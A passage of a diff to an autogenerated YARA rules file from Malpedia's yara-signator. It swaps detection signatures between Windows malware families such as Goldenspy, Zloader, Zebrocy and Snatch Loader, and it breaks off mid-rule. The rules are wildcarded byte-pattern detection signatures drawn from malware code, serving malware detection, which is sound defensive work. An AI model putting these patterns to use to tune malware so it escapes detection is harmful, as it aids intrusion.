"TLP:WHITE" strings: - $sequence_0 = { c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????a1a14538 c705????????2086e659 } - $sequence_1 = { 740e 3d10b6afa6 7407 3d36ce164d } - $sequence_2 = { 6800f00000 81c600f00000 68???????? 56 e8???????? } - $sequence_3 = { 50 51 8d85bcebffff 50 56 } - $sequence_4 = { c705????????d468bcb5 c705????????a1a14538 c705????????2086e659 c705????????eec45abf } - $sequence_5 = { c705????????9cb95b4c c705????????2d494a94 c705????????8db133d4 c705????????8e220b1d } - $sequence_6 = { 6800040000 8d8598f6ffff 6a00 50 e8???????? 83c40c 8d8598feffff } - $sequence_7 = { 8d850af8ffff c78500f8ffff52617354 6a00 50 } - $sequence_8 = { f3a4 50 0f1185a8faffff e8???????? } - $sequence_9 = { 8bce a3???????? e8???????? 8b15???????? 8b4dfc } + $sequence_0 = { 7703 80c1e0 3ad1 7513 49ffc0 } + $sequence_1 = { 660f1f840000000000 410fb707 418b3e 6603c1 4803f9 0fb7c0 } + $sequence_2 = { 66443908 75f4 443bc1 740a b801000000 } + $sequence_3 = { 49f7d9 4c8bc5 660f1f840000000000 420fb61407 410fb608 8d429f 3c19 } + $sequence_4 = { 488bc7 ffc1 488d4001 803800 75f5 33d2 } + $sequence_5 = { 75f3 418bc9 66390a 7417 } + $sequence_6 = { 740e 488bc5 ffc2 488d4001 803800 } + $sequence_7 = { 4c03d1 458b7220 418b521c 4c03f1 458b7a24 4803d1 } + $sequence_8 = { 0fb70a 418d409f 6683f819 7704 } + $sequence_9 = { 75f3 418bc9 66390a 7417 488bc2 0f1f840000000000 ffc1 } condition: - 7 of them and filesize <1171456 + 7 of them and filesize <643072 } -rule MALPEDIA_Win_Goldenspy_Auto : FILE +rule MALPEDIA_Win_Jssloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "2db85832-8503-5134-9cf2-a79f16f8ed47" + id = "e1eaf0bc-7617-5378-87a8-cba9c6423b69" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.goldenspy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.goldenspy_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.jssloader_auto.yar#L1-L129" license_url = "N/A" - logic_hash = "45ec0195c1eec86aab8f23405836b0cab0b81ad642d99b8dc40b2feb153827cd" + logic_hash = "186e7df3cf3822e82929f92759ecc1d78a3a2d538dfeac54de7cfb7d33d930ef" score = 75 quality = 75 tags = "FILE" @@ -178211,32 +180926,32 @@ rule MALPEDIA_Win_Goldenspy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 0f87e4000000 e9???????? 83c754 837f1000 740f 68???????? 8bcf } - $sequence_1 = { 83c0fc 83f81f 0f8777060000 52 51 e8???????? 83c408 } - $sequence_2 = { 8b7608 807e0d00 74a8 8b4de8 8b5de4 } - $sequence_3 = { e8???????? 8b551c 83fa10 0f82b8fcffff 8b4d08 42 8bc1 } - $sequence_4 = { e8???????? 51 68???????? 8bcb e8???????? 8b83c8000000 } - $sequence_5 = { 8d4dd8 6a1a 68???????? c745e800000000 c745ec0f000000 c645d800 e8???????? } - $sequence_6 = { 57 68???????? e8???????? 8d47ff 83c408 83f804 } - $sequence_7 = { 75f2 8b5308 8bf2 8b7b14 0f1f00 8a02 42 } - $sequence_8 = { ff75e4 ff461c 8d4628 50 e8???????? 897e30 c7463400000000 } - $sequence_9 = { 8b85f8feffff 8b4004 c78405f8feffffb4e24600 8b85f8feffff 8b4804 8d41b0 89840df4feffff } + $sequence_0 = { 89b5e0fbffff 660fd685e4fbffff 89b5ecfbffff 89b5e4fbffff 89b5e8fbffff 89b5ecfbffff } + $sequence_1 = { 0f4345b4 50 ff15???????? 8bf0 89b5c0fdffff 83feff 0f84b9020000 } + $sequence_2 = { 8945fc 56 8b7508 8d85fcfeffff 6800010000 6a00 50 } + $sequence_3 = { 899d0cffffff 6a04 68???????? c745d000000000 c745d40f000000 c645c000 e8???????? } + $sequence_4 = { 2bc6 83c0fc 83f81f 0f8797010000 e9???????? 8b854cfeffff 8d4804 } + $sequence_5 = { 51 ffb570feffff 8d4dcc e8???????? c645fc0b 8b55e0 8bc2 } + $sequence_6 = { 3b85ecfbffff 740a 8808 ff85e8fbffff } + $sequence_7 = { 8bc1 83e13f c1f806 6bc938 8b0485701d4400 80640828fe ff33 } + $sequence_8 = { 03f0 56 e8???????? 8b8534ffffff 83c40c 8b8d54feffff } + $sequence_9 = { 03f0 56 e8???????? 8b854cffffff 83c40c c6043000 8bb568feffff } condition: - 7 of them and filesize <1081344 + 7 of them and filesize <581632 } -rule MALPEDIA_Win_Doublefantasy_Auto : FILE +rule MALPEDIA_Win_Alreay_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "fe1fe594-5930-58a6-8152-affb40d52392" + id = "9cdb1d27-466b-525b-895d-ad710c42b112" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.doublefantasy_auto.yar#L1-L176" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.alreay" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.alreay_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "c2743e8ba6874f5905b98f01968f640324da6dd46040ee9e2e2dc712fae3b7b1" + logic_hash = "9b54d114d735844c857255b8100f13777f444dd5372ec863d1d85e3d492b2e7d" score = 75 quality = 75 tags = "FILE" @@ -178250,38 +180965,32 @@ rule MALPEDIA_Win_Doublefantasy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ff75e0 e8???????? 8945c4 3d05000780 7458 3d09000c80 } - $sequence_1 = { 770b 0fb6c0 8a80ad8c2700 eb02 32c0 84c0 7410 } - $sequence_2 = { 8a80908c2700 eb02 b03d 884103 c3 55 } - $sequence_3 = { 33d2 8a5001 c1ee06 83e20f c1e202 0bd6 8a92908c2700 } - $sequence_4 = { ff750c 8b4622 03c6 50 e8???????? 83c40c be???????? } - $sequence_5 = { 51 68???????? ff750c 8b1d???????? ffd3 83c420 ff75e0 } - $sequence_6 = { 8a92908c2700 885101 7e1c 0fb67002 } - $sequence_7 = { ff45f8 3c2b 720f 3c7a 770b 0fb6c0 8a80ad8c2700 } - $sequence_8 = { 0bd6 837c241001 8a92908c2700 885101 } - $sequence_9 = { 8a92908c2700 eb02 b23d 837c241002 885102 } - $sequence_10 = { 85c0 7c6a 8b45e4 8b08 8d954cffffff } - $sequence_11 = { e8???????? 8b4605 c68094a3270000 ff35???????? ff35???????? e8???????? 83c414 } - $sequence_12 = { a5 a5 a5 66a5 6a3d 59 } - $sequence_13 = { 68???????? 68???????? ff15???????? 83c40c 837de000 0f8660010000 } - $sequence_14 = { ff750c ff7508 ff15???????? 8945a8 3bc3 752b } - $sequence_15 = { 33ff eb06 56 e8???????? } + $sequence_0 = { 8bca 83e103 03eb f3aa e9???????? 83fa07 7511 } + $sequence_1 = { 89b48484010000 8a442418 fec0 885c2420 8b5c2424 88442418 8b442420 } + $sequence_2 = { 894c2404 7407 b802000000 eb1d 8b90e8010000 85d2 7411 } + $sequence_3 = { 89442428 85c0 0f850c010000 8b442420 3bc7 7608 8bd7 } + $sequence_4 = { 8b8574010000 8bd1 23d0 83faff 0f848d000000 3bc3 7c55 } + $sequence_5 = { 8b15???????? 8b442414 8b742444 8b4c2448 42 40 83c604 } + $sequence_6 = { 8a16 8bcf 84d2 8bc6 741d 8a10 80fa5c } + $sequence_7 = { 8b8268020000 3bc1 0f852f040000 8b86b4040000 8bca 8b916c020000 3bd0 } + $sequence_8 = { bb16000000 3bc3 bf15000000 0f85f5010000 8b7500 8b86cc000000 8bd0 } + $sequence_9 = { 8d7c2448 83c9ff 33c0 8b54241c f2ae f7d1 49 } condition: - 7 of them and filesize <172032 + 7 of them and filesize <1867776 } -rule MALPEDIA_Win_Zebrocy_Auto : FILE +rule MALPEDIA_Win_Xiaoba_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "ddee4b03-585f-5184-85a4-c6cc1e810bdc" + id = "9683766b-1f7a-5c2a-bffb-7de9b80367d1" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zebrocy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zebrocy_auto.yar#L1-L161" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.xiaoba_auto.yar#L1-L134" license_url = "N/A" - logic_hash = "619394d96ac2748c82d29651fdad853561cf847222687873937db9b64b7f21e0" + logic_hash = "52112f4a96abd368fbd89cb5e047b8d530704099fd198766e1597b7a0bbb2ccf" score = 75 quality = 75 tags = "FILE" @@ -178295,38 +181004,32 @@ rule MALPEDIA_Win_Zebrocy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 014158 11515c e8???????? dc6360 } - $sequence_1 = { 8bc6 33d2 66891478 8bc6 5f c3 8bff } - $sequence_2 = { 0103 83c41c 5b 5e } - $sequence_3 = { 83c438 68581b0000 ff15???????? 83bd00f7ffff08 8b85ecf6ffff 7306 8d85ecf6ffff } - $sequence_4 = { 8b7508 837e0800 7610 8b4608 8d808c994200 fe08 } - $sequence_5 = { 0110 8b7dd4 ba???????? 89470c } - $sequence_6 = { 0103 8b0e ba???????? e8???????? } - $sequence_7 = { 8b441a20 85c9 7f0d 7c05 83f801 7706 } - $sequence_8 = { 0102 8b45d4 89500c 89c1 } - $sequence_9 = { 014150 8b550c 115154 014158 } - $sequence_10 = { 0f8553010000 837de400 7c5d 7f04 85f6 } - $sequence_11 = { 0103 31d2 85ff 8b03 } - $sequence_12 = { 7303 8d45b8 8b4dc8 03c8 8bc6 83fa10 } - $sequence_13 = { 68???????? 6888000800 ff15???????? 8bf0 85f6 } - $sequence_14 = { 0110 5e 5f 5d } - $sequence_15 = { 3bc1 0f87c8090000 ff2485689c4100 33c0 838de8fdffffff } + $sequence_0 = { 58 8945ec e9???????? 8b5dfc 83c320 895dd0 6801030080 } + $sequence_1 = { b801000000 c20c00 8b9024010000 8b44240c 8910 b801000000 c20c00 } + $sequence_2 = { 8b5c243c 8b7c2464 8b542428 8b442430 03c3 42 89442430 } + $sequence_3 = { dc442410 dd5c2410 e9???????? db8740010000 dc6c2418 dd5c2418 e9???????? } + $sequence_4 = { 8b8894010000 33d2 85c9 0f95c2 8bc2 c20800 8b90b4010000 } + $sequence_5 = { 8d54b500 8b3c02 8d44f500 83c704 57 50 e8???????? } + $sequence_6 = { 85c9 7519 8b54240c 33c9 890a 8b8820010000 894a04 } + $sequence_7 = { 85c0 be???????? 7505 be???????? e8???????? 8b4008 56 } + $sequence_8 = { 8b10 52 e8???????? 83c404 8b4c2474 8901 8d4c2414 } + $sequence_9 = { 8903 8965e8 6800000000 6800000000 6800000000 ff75f0 6800000000 } condition: - 7 of them and filesize <393216 + 7 of them and filesize <5177344 } -rule MALPEDIA_Win_Zeoticus_Auto : FILE +rule MALPEDIA_Win_Reaver_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c2a18f25-bc43-5657-ba7f-277a7d143bb2" + id = "92b8afe7-b0ea-5ba5-8d5f-5512437f6132" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zeoticus" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zeoticus_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.reaver" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.reaver_auto.yar#L1-L116" license_url = "N/A" - logic_hash = "a4d1e69467730f44a44fc31899a04b37f3c67c9d35561598e18a4009fa030896" + logic_hash = "8a78ae101ee8d9e477556b7d81328c10daa6a32306210d234ed44ad07120f4bd" score = 75 quality = 75 tags = "FILE" @@ -178340,32 +181043,32 @@ rule MALPEDIA_Win_Zeoticus_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { b901000000 8b442404 0f44f1 85c0 7407 50 ff15???????? } - $sequence_1 = { 6a00 6a02 6a01 6a00 6a00 6a00 6890010000 } - $sequence_2 = { 53 68???????? 50 89048d00574300 ff15???????? a1???????? 83c410 } - $sequence_3 = { 8b0d???????? 8d442420 6a00 6a00 6a00 6a25 6800800000 } - $sequence_4 = { 8d4c2430 6a18 51 ffd0 a1???????? 83c408 85c0 } - $sequence_5 = { 42 88440e14 8b4c2424 41 894c2424 83fa0b } - $sequence_6 = { 56 57 8b7c2414 894c2418 390f 0f86df010000 } - $sequence_7 = { a3???????? c705????????00000000 c705????????00000000 c705????????00000000 e8???????? 8b4c2408 8b542404 } - $sequence_8 = { 56 57 894c2410 8b7810 8bf7 90 } - $sequence_9 = { 83c408 a3???????? ff742420 ffd0 85c0 754a } + $sequence_0 = { ff15???????? 85c0 7453 8d45f4 50 ff7508 } + $sequence_1 = { 50 ff7508 6a00 ff15???????? 85c0 7440 } + $sequence_2 = { ff15???????? 85c0 7453 8d45f4 } + $sequence_3 = { 85c0 7453 8d45f4 50 ff7508 } + $sequence_4 = { 85c0 7440 8b45f4 6a00 8945e8 } + $sequence_5 = { 85c0 7440 8b45f4 6a00 } + $sequence_6 = { 85c0 740d ff15???????? 3d14050000 7504 33c0 } + $sequence_7 = { 8bec 83ec1c 8d45fc 50 68ff010f00 } + $sequence_8 = { 8bec 83ec1c 8d45fc 50 68ff010f00 ff15???????? 50 } + $sequence_9 = { 85c0 740d ff15???????? 3d14050000 } condition: - 7 of them and filesize <468992 + 7 of them and filesize <106496 } -rule MALPEDIA_Win_Shipshape_Auto : FILE +rule MALPEDIA_Win_Snatch_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "77ebf79f-670a-594a-bd26-db4684807e7a" + id = "27465de5-7033-587f-a756-9377f064a810" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shipshape" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.shipshape_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.snatch_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.snatch_loader_auto.yar#L1-L176" license_url = "N/A" - logic_hash = "d30091c6ebd49f11de789ea622fcb4cbfab75e230e1b049ba06177bb5b7dc7cb" + logic_hash = "0092d0e62ac35cefc4568a8a8fbdf579b918d859e448f714bc73aa915417d36e" score = 75 quality = 75 tags = "FILE" @@ -178379,34 +181082,40 @@ rule MALPEDIA_Win_Shipshape_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 68???????? 68???????? 8d942440020000 68???????? 52 } - $sequence_1 = { 83e103 50 f3a4 ffd3 e9???????? 56 e8???????? } - $sequence_2 = { 68???????? 8d942440020000 68???????? 52 e8???????? 83c434 } - $sequence_3 = { c1f905 8b0c8d60d54000 f644c10401 8d04c1 7403 8b00 } - $sequence_4 = { 8d542438 8d842400070000 52 50 } - $sequence_5 = { 8d84244c040000 68???????? 50 e8???????? 8d8c2454040000 51 } - $sequence_6 = { 8d4c2414 50 51 6a00 6a00 6a00 } - $sequence_7 = { 5b 81c440060000 c3 56 57 } - $sequence_8 = { 50 51 ffd3 5f 5e 33c0 } - $sequence_9 = { 83c418 3bc6 7e0f 5f 5e } + $sequence_0 = { 66894606 a1???????? 85c0 7522 6a02 59 } + $sequence_1 = { 8bc8 8b45fc 33d2 85c9 5e 0f45c2 8be5 } + $sequence_2 = { 51 56 56 ffd0 8bc8 8b45fc 33d2 } + $sequence_3 = { 33f6 8bd9 57 85c0 7522 6a02 } + $sequence_4 = { ffd0 5f 85c0 7509 8bce e8???????? } + $sequence_5 = { ffd0 85c0 8bce 0f457dfc } + $sequence_6 = { 85c0 7505 8b45fc eb0d 53 53 } + $sequence_7 = { 33f6 8bd6 8975fc 66397102 740b 42 } + $sequence_8 = { 46 3bf3 76d8 33c0 48 5a 59 } + $sequence_9 = { 741f 3a0439 7514 41 3b4df8 } + $sequence_10 = { 68???????? 58 ffd0 8945f0 0bc0 } + $sequence_11 = { 33d2 33c9 8a0431 0ac0 741f } + $sequence_12 = { 52 ff750c e8???????? 8945fc 0bc0 7454 394508 } + $sequence_13 = { 55 8bec 83c4fc 53 33db 837d0800 } + $sequence_14 = { 3b45fc 773b 8b750c 8b7d10 037508 8bde } + $sequence_15 = { 7206 3c5a 7702 0c20 c1c210 } condition: - 7 of them and filesize <338386 + 7 of them and filesize <262144 } -rule MALPEDIA_Win_Rorschach_Auto : FILE +rule MALPEDIA_Win_Zloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "1c4aea68-8f40-596d-a63a-efb95cb498a7" + id = "97b40e53-0323-5f57-82eb-14236d63ac31" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rorschach" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.rorschach_auto.yar#L1-L134" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zloader_auto.yar#L1-L384" license_url = "N/A" - logic_hash = "0cdb3537df7f12a9076109ea202e9af8c6db5ccfaaca59c4a71971579385ead3" + logic_hash = "d615cfd8aec428fea853159c669b5f75c64755d955e56d958f0ce28518a00d78" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -178418,32 +181127,62 @@ rule MALPEDIA_Win_Rorschach_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 33d2 488d8df8020000 e8???????? 88850e030000 b26e 488d8df8020000 e8???????? } - $sequence_1 = { f65d7f 488d15ece30000 4c8d05e9e30000 488955df 488d05d2e30000 488955e7 488945bf } - $sequence_2 = { f5 66d3f7 66c1f703 d3d7 4801e3 d2f0 c0f807 } - $sequence_3 = { f30f7f4de0 660f6f05???????? f30f7f45f0 660f6f0d???????? f30f7f4d00 c74510771a771b c6451477 } - $sequence_4 = { 0c40 8845df e8???????? 4c8d05e8180700 488d55c0 488d4da0 e8???????? } - $sequence_5 = { 33c0 48894310 48c7431807000000 668903 488b4c2458 4833cc e8???????? } - $sequence_6 = { 33d2 488d4da8 e8???????? 8845b4 b272 488d4da8 e8???????? } - $sequence_7 = { e8???????? 88851e0b0000 b265 488d8de0080000 e8???????? 88851f0b0000 33d2 } - $sequence_8 = { e8???????? c60000 ba0f000000 488d4d99 e8???????? c60000 488d4d99 } - $sequence_9 = { f6d4 660fbec0 0f98c0 488d7f01 0fb6c0 0f94c4 88f0 } + $sequence_0 = { 57 6a01 56 ffd0 89f7 89f8 } + $sequence_1 = { 57 56 83ec0c 8b5d0c 8b7d10 8d75e8 89f1 } + $sequence_2 = { 55 89e5 56 8b7508 ff36 e8???????? 83c404 } + $sequence_3 = { 0fb7450c 8d9df0feffff 53 50 ff7508 e8???????? } + $sequence_4 = { 57 56 8b7d08 57 e8???????? } + $sequence_5 = { 0fb7c0 57 50 53 e8???????? 83c40c 89f1 } + $sequence_6 = { 53 56 83ec0c 8d75ec 56 6aff } + $sequence_7 = { 55 89e5 56 8b750c ff7508 e8???????? 83c404 } + $sequence_8 = { 56 50 a1???????? 89c1 } + $sequence_9 = { 5e 8bc3 5b c3 8b44240c } + $sequence_10 = { 68???????? ff742408 e8???????? 59 59 84c0 741e } + $sequence_11 = { e8???????? 59 84c0 7432 68???????? ff742408 e8???????? } + $sequence_12 = { 57 56 50 8b4510 31db } + $sequence_13 = { e8???????? 03c0 6689442438 8b442438 } + $sequence_14 = { 6aff 50 e8???????? 8d857cffffff 50 } + $sequence_15 = { 50 89542444 e8???????? 03c0 } + $sequence_16 = { 6689442438 8b442438 83c002 668944243a } + $sequence_17 = { 83c414 c3 56 ff742410 } + $sequence_18 = { 99 52 50 8d44243c 99 52 50 } + $sequence_19 = { c6043000 5e c3 56 57 8b7c2414 83ffff } + $sequence_20 = { 50 56 56 56 ff7514 } + $sequence_21 = { 83c408 5e 5d c3 55 89e5 57 } + $sequence_22 = { 6a00 e8???????? 83c414 c3 8b542404 } + $sequence_23 = { c7462401000000 c7462800004001 e8???????? 89460c } + $sequence_24 = { 81c4a8020000 5e 5f 5b } + $sequence_25 = { 55 89e5 53 57 56 81eca8020000 } + $sequence_26 = { e9???????? 31c0 83c40c 5e 5f } + $sequence_27 = { 0bc3 a3???????? e8???????? 8bc8 eb06 8b0d???????? 85c9 } + $sequence_28 = { 89b42430010000 8b842430010000 8b842430010000 890424 c74424041c010000 e8???????? } + $sequence_29 = { 89cf 8d0476 8945ec 890424 } + $sequence_30 = { 50 6a72 e8???????? 59 } + $sequence_31 = { 56 57 ff750c 33db 68???????? 6880000000 50 } + $sequence_32 = { 8bc2 ebf7 8d442410 50 ff742410 ff742410 ff742410 } + $sequence_33 = { 56 68???????? ff742410 e8???????? 6823af2930 56 ff742410 } + $sequence_34 = { 50 e8???????? 68???????? 56 e8???????? 8bf0 59 } + $sequence_35 = { 5f 5e 5b c3 8bc2 ebf8 53 } + $sequence_36 = { 33f6 e8???????? ff7508 8d85f0fdffff 68???????? } + $sequence_37 = { 68???????? 56 e8???????? 5e c3 56 } + $sequence_38 = { 8d85f0fdffff 68???????? 6804010000 50 e8???????? 83c414 8d45fc } + $sequence_39 = { 8bc2 ebf8 53 8b5c240c 55 33ed } condition: - 7 of them and filesize <3921930 + 7 of them and filesize <1105920 } -rule MALPEDIA_Win_Enfal_Auto : FILE +rule MALPEDIA_Win_C0D0So0_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7c648ee2-e4dd-541c-9b47-28a132a1416c" + id = "7fd27b52-4a26-50f0-a471-2ac29e8cd05c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.enfal" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.enfal_auto.yar#L1-L112" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.c0d0so0_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "4106f1f3c4e35436925009af22c1e6b23f6200a61794638682b09644acc42fa2" + logic_hash = "80f1d1736e25190b04ddf50f3339fde0073091aa1984fb16860f6c3d691cdb86" score = 75 quality = 75 tags = "FILE" @@ -178457,32 +181196,32 @@ rule MALPEDIA_Win_Enfal_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ffd6 68???????? 57 8945d8 ffd6 68???????? 53 } - $sequence_1 = { 51 53 ff505c 85c0 } - $sequence_2 = { 50 6a00 6a01 ff7608 } - $sequence_3 = { 57 6800000040 51 ff5010 8bd8 } - $sequence_4 = { 81ec4c0a0000 80a5b4f9ffff00 56 baff000000 } - $sequence_5 = { 8b4b24 8b431c 8b5320 8365fc00 } - $sequence_6 = { 50 e8???????? 83c410 8b461c } - $sequence_7 = { 8bec 81eccc040000 53 56 8b35???????? 57 } - $sequence_8 = { ffd0 5e c3 ff15???????? 5e c3 } - $sequence_9 = { 66a5 a4 be???????? 8dbd60ffffff } + $sequence_0 = { 895dfc 8975f4 ff15???????? ff75f8 } + $sequence_1 = { 7404 0006 eb02 2806 0fb6c0 03d0 03f0 } + $sequence_2 = { 807e0d00 c6460801 7469 8b460e 8b1d???????? 8365f800 83c012 } + $sequence_3 = { 53 8b5f04 c745f401000000 0f86f4000000 56 8bb080000000 6a14 } + $sequence_4 = { 83c204 83f914 7ceb 8bc7 8b4dfc 33cd } + $sequence_5 = { 752c 6a01 56 e8???????? 59 59 } + $sequence_6 = { 50 33ff ff15???????? 8d4598 50 ff15???????? } + $sequence_7 = { ff7334 ffd6 8945fc 85c0 } + $sequence_8 = { 3acb 75f6 8bc7 5f 5e } + $sequence_9 = { 33ff 53 47 e8???????? 59 eb0b 56 } condition: - 7 of them and filesize <65536 + 7 of them and filesize <450560 } -rule MALPEDIA_Win_Hotcroissant_Auto : FILE +rule MALPEDIA_Win_Webc2_Adspace_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "250e256f-bf01-5062-b0b5-f902754e1ec1" + id = "31690ec3-53d2-516a-a2ac-2daa7b554ffe" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hotcroissant" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hotcroissant_auto.yar#L1-L117" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_adspace" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.webc2_adspace_auto.yar#L1-L118" license_url = "N/A" - logic_hash = "2f7df521e2093bda16bb20427bf0af1885ac8e8db0533585bb878e9befdcfdd1" + logic_hash = "7852a8a7e96f78b645860237edf52acf830636cf13e5faeed5b1eb81bda4c09a" score = 75 quality = 75 tags = "FILE" @@ -178496,32 +181235,32 @@ rule MALPEDIA_Win_Hotcroissant_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { c705????????01000000 ffd6 6800040000 68???????? } - $sequence_1 = { 68???????? 68???????? 68???????? c705????????0c000000 c705????????00000000 c705????????01000000 } - $sequence_2 = { 25ff7f0000 33c9 7707 3d00400000 7608 6a0a ff15???????? } - $sequence_3 = { 83e780 c1e307 33fb c1e711 c1e808 46 0bc7 } - $sequence_4 = { 85c0 7506 6a0a ffd6 } - $sequence_5 = { 6a00 68703a0000 6a00 50 ffd7 85c0 } - $sequence_6 = { e8???????? 6a00 c705????????00000000 ff15???????? 6a00 } - $sequence_7 = { 8d958cc5ffff 52 50 ff15???????? 85c0 } - $sequence_8 = { ff15???????? 85c0 7506 6a0a } - $sequence_9 = { 56 6a01 50 ff15???????? a1???????? } + $sequence_0 = { 8d8580feffff 68???????? 50 ffd6 ff750c 894510 } + $sequence_1 = { ffd6 8bf8 c70424???????? ffd6 } + $sequence_2 = { 50 8d8580feffff 50 e8???????? 8b35???????? 8d8580feffff } + $sequence_3 = { 8d4dec e8???????? 8d4dec e8???????? 6a0a ff15???????? a1???????? } + $sequence_4 = { c3 56 8b742408 56 e8???????? 59 8b4c2410 } + $sequence_5 = { 0f84f8010000 80a4241c01000000 6a3f 59 33c0 } + $sequence_6 = { 7469 6a00 57 56 } + $sequence_7 = { 50 e8???????? 83c40c 8bf8 8d45fc 50 } + $sequence_8 = { 59 33c0 85ff 59 } + $sequence_9 = { a1???????? 40 50 57 56 } condition: - 7 of them and filesize <591872 + 7 of them and filesize <49152 } -rule MALPEDIA_Win_Fengine_Auto : FILE +rule MALPEDIA_Win_Zitmo_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "c3f38b1d-0317-5325-80d6-6bc13a77b878" + id = "f6f59970-f923-5e51-84d0-3f8e29574b3c" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fengine" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.fengine_auto.yar#L1-L115" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zitmo" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.zitmo_auto.yar#L1-L119" license_url = "N/A" - logic_hash = "04b59b3b4a1631576dab348f5698f6f17211f788439d858316727821c2f4b921" + logic_hash = "a3b8b6f5916a461447d9c48219b755dccd1a5d708dba30f1dbbe42f800df788f" score = 75 quality = 75 tags = "FILE" @@ -178535,34 +181274,34 @@ rule MALPEDIA_Win_Fengine_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 72e2 8b5c2414 8d842490000000 50 } - $sequence_1 = { 833cfd4010410000 755b 6a18 e8???????? 59 } - $sequence_2 = { 50 ff15???????? 68???????? 8d85fcf7ffff 6800080000 } - $sequence_3 = { 7405 352083b8ed 46 3bf7 0f825fffffff 5f } - $sequence_4 = { c1e81e 83e001 83e101 8d0c48 8bc6 } - $sequence_5 = { 53 8d4e04 6800080000 51 } - $sequence_6 = { 56 e8???????? 